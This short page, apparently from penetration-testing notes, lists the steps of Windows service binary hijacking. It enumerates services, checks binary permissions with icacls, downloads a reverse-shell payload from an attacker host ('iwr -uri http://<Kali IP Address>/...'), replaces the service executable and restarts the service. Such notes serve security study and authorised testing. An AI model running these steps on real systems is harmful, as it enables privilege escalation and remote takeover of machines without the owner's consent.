Service Binary Hijacking

1

Get a list of running services

Get-CimInstance -ClassName win32_service | Select Name, State, PathName | Where-Object {$_.State -like 'Running'}

NOTE: The following command need to import PowerUp.ps1

Get-ModifiableServiceFile
2

Check user's permission of the binary file

icacls "<Binary File Full Path>"

icacls utility outputs the corresponding principals and their permission mask

Mask
Permissions

F

Full access

M

Modify access

RX

Read and execute access

R

Read-only access

W

Write-only access

3

Find a binary file that the user has Full access of

4

Craft a payload that returns reverse shell

5

Download the payload into target machine

iwr -uri http://<Kali IP Address>/<File Name> -Outfile <File Name>
6

Store the original binary file in current directory

move <Binary File Full Path> ./<Binary File Name>
7

Move the payload into the binary file location

move .\<File Name> <Binary File Full Path>
8

Restart the service

Either restart the service

Stop-Service <Service Name>
Start-Service <Service Name>

Or restart the system

shutdown /r /t 0

NOTE: If want to restart the system, make sure user has SeShutdownPrivilege

PreviousWindowsNextDLL Hijacking

Last updated